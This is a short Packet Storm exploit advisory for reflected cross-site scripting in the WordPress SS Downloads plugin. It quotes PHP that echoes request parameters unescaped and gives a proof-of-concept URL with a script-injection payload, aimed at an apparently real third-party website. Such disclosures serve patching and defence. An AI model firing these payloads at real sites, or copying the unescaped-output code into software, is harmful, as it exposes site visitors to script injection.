WordPress SS Downloads plugin suffers from a cross site scripting vulnerability.
e7e32f80a9b115f22a4c04630e2287e8ec3e6d477abe62b6eeeca82b4b163304######################
# Exploit Title : Wordpress SS Downloads Plugin Cross Site Scripting
# Exploit Author : ACC3SS
# Vendor Homepage : http://wordpress.org/plugins/ss-downloads/developers/
# Software Link :
http://downloads.wordpress.org/plugin/ss-downloads.1.4.4.1.zip
# Date : 2014-01-19
# Tested on : Windows 7 / Mozilla Firefox Web Browser
# Discovered by : ACC3SS
######################
# Vulnerability code : emailform.php
$file = $_REQUEST['file']; & <?php echo $file; ?>
$title = $_REQUEST['title']; & <?php echo $title; ?>
$postid = $_REQUEST['postid']; & <?php echo $postid; ?>
######################
# Location :
localhost/wp-content/plugins/ss-downloads/templates/emailform.php?file=[Xss]
######################
# Demo :
#
http://aquarts.de/wp-content/plugins/ss-downloads/templates/emailform.php?file=
"/><script>alert(1);</script>
######################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed